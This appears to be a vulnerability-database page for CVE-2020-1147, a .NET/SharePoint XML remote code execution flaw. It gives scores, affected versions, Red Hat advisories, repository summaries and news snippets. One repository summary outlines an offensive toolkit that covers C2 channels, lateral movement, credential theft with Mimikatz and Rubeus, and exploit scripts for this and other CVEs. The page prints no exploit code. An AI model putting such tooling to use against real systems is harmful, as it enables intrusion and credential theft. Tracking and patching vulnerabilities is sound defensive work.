
CVE-2020-1147

Published: 14/07/2020 Updated: 31/07/2020
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Microsoft .NET Framework, SharePoint, and Visual Studio could allow a remote malicious user to execute arbitrary code on the system because the software fails to check the source markup of XML file input. By uploading a specially crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim.

Affected Products

Vendor     Product                       Versions
Microsoft  .NET Core                     2.1, 3.1
Microsoft  .NET Framework                2.0, 3.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8
Microsoft  SharePoint Enterprise Server  2013, 2016
Microsoft  SharePoint Server             2010, 2019
Microsoft  Visual Studio 2017            15.0, 15.1, 15.1.1, 15.1.2, 15.2, 15.2.1, 15.2.2, 15.2.3, 15.2.4, 15.2.5, 15.3, 15.3.1, 15.3.2, 15.3.3, 15.3.4, 15.3.5, 15.4, 15.4.1, 15.4.2, 15.4.3, 15.4.4, 15.4.5, 15.5, 15.5.1, 15.5.2, 15.5.3, 15.5.4, 15.5.5, 15.5.6, 15.5.7, 15.6, 15.6.1, 15.6.2, 15.6.3, 15.6.4, 15.6.5, 15.6.6, 15.6.7, 15.7, 15.7.1, 15.7.2, 15.7.3, 15.7.4, 15.7.5, 15.7.6, 15.8, 15.8.1, 15.8.2, 15.8.3, 15.8.4, 15.8.5, 15.8.6, 15.8.7, 15.8.8, 15.9
Microsoft  Visual Studio 2019            16.0, 16.0.1, 16.0.2, 16.0.3, 16.0.4, 16.0.5, 16.0.6, 16.0.7, 16.1, 16.1.1, 16.1.2, 16.1.3, 16.1.4, 16.1.5, 16.1.6, 16.2, 16.2.1, 16.2.2, 16.2.3, 16.2.4, 16.3, 16.3.0, 16.3.1, 16.3.2, 16.3.3, 16.3.4, 16.3.5, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.4, 16.4.1, 16.4.2, 16.4.3, 16.4.4, 16.4.5, 16.4.6, 16.5, 16.5.0, 16.5.1, 16.5.2, 16.6

Vendor Advisories

Red Hat, Critical: .NET Core security and bugfix update (Security Advisory: Critical). An update for .NET Core is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) ...

Red Hat, Critical: .NET Core 2.1 on Red Hat Enterprise Linux security and bugfix update (Security Advisory: Critical). An update for rh-dotnet21-dotnet is now available for .NET Core on Red Hat Enterprise Linux. Red Hat Product Security has rated this update as having a security impact of Cr ...

Red Hat, Critical: .NET Core 3.1 on Red Hat Enterprise Linux security and bugfix update (Security Advisory: Critical). An update for rh-dotnet31-dotnet is now available for .NET Core on Red Hat Enterprise Linux. Red Hat Product Security has rated this update as having a security impact of Cr ...

Red Hat, Critical: .NET Core 3.1 security and bugfix update (Security Advisory: Critical). An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring Syste ...

Red Hat, Critical: .NET Core security update (Security Advisory: Critical). An update for .NET Core is now available for Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerabil ...

Github Repositories

CS2020 (wshepherd0010). GPL-3.0 License. 32 commits, 2 branches, 0 tags; no releases published. No description, website, or topics provided. Languages: PowerShell 95.0%, Python 3.1%, Ruby 1.0%, Shell 0.9%, C# 0.0%, ASP 0.0%. Top-level contents: c2, modules, scripts, LICENSE, README.md.

README, MSEL concepts:
- Authenticated C2 via ICMP on Linux and Windows
- Fallback channels using hardcoded IPs and calculated subnets
- Proxied lateral movement using PTT/PTH via WMI, RPC/DCOM, SMB, and WinRM
- Defense evasion using in-memory payloads, encryption, timestamp modification, and byte randomization
- Credential access using Mimikittenz, Mimikatz, Minidump, Rubeus, and InternalMonologue
- Privilege escalation using process injection, parent process spoofing, and token theft

The rest of the README is an operator command runbook organised by phase (DMZ, GREYZONE, EXTERNAL .NET SITE, LATERAL MOVEMENT). It references this vulnerability through a sharepoint_cve-2020-1147.py script, listed alongside scripts for CVE-2019-0604, CVE-2020-0646, CVE-2020-0796, CVE-2020-0618 and CVE-2019-0708, with a note that the payloads for those scripts have to be edited before use.

nuclei-templates (projectdiscovery). MIT License. 814 commits, 1 branch, 43 tags; 43 releases, latest v4.0.2 (22 hours ago); 67 contributors. Topics: nuclei-templates, nuclei, bugbounty, security, content-bruteforcing. Related project: github.com/projectdiscovery/nuclei.

About: Community curated list of template files for the nuclei engine to find security vulnerabilities and fingerprint targets.

README: Templates are the core of the nuclei scanner, which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via pull requests and grow the list.

Template directory (13 directories, 204 templates): basic-detections, brute-force, cves, dns, files, panels, payloads, security-misconfiguration, subdomain-takeover, technologies, tokens, vulnerabilities, workflows. The template for this vulnerability is cves/CVE-2020-1147.yaml.

Please navigate to https://nuclei.projectdiscovery.io for detailed documentation on building your own custom templates, with many example templates for easy understanding.

Notes:
- Use YAMLlint (e.g. yamllint) to validate new templates when sending pull requests.
- Use a YAML formatter (e.g. jsonformatter) to format new templates when sending pull requests.

Thanks again for your contribution and keeping the community vibrant.

Recent Articles

Critical SharePoint flaw dissected, RCE details now available
BleepingComputer • Ionut Ilascu • 22 Jul 2020

Details are now available for exploiting a critical security vulnerability that affects Microsoft SharePoint, increasing the risk of attacks on unpatched systems.
A technical blog post this week explains how the bug works and how a low-privileged user can leverage it to run arbitrary code remotely on a target SharePoint server.


Mega Patch Tuesday
The Register

Microsoft on Tuesday patched a wormable hole in its Windows Server software that can be exploited remotely to completely commandeer the machine without any authorization. It was one of hundreds of security bugs squashed today by Redmond along with Oracle, Adobe, VMware, SAP and Google.
Microsoft emitted fixes for 123 vulnerabilities in this month's Patch Tuesday batch. Some 18 of those CVE-listed security flaws are considered critical, meaning remote code execution (RCE)...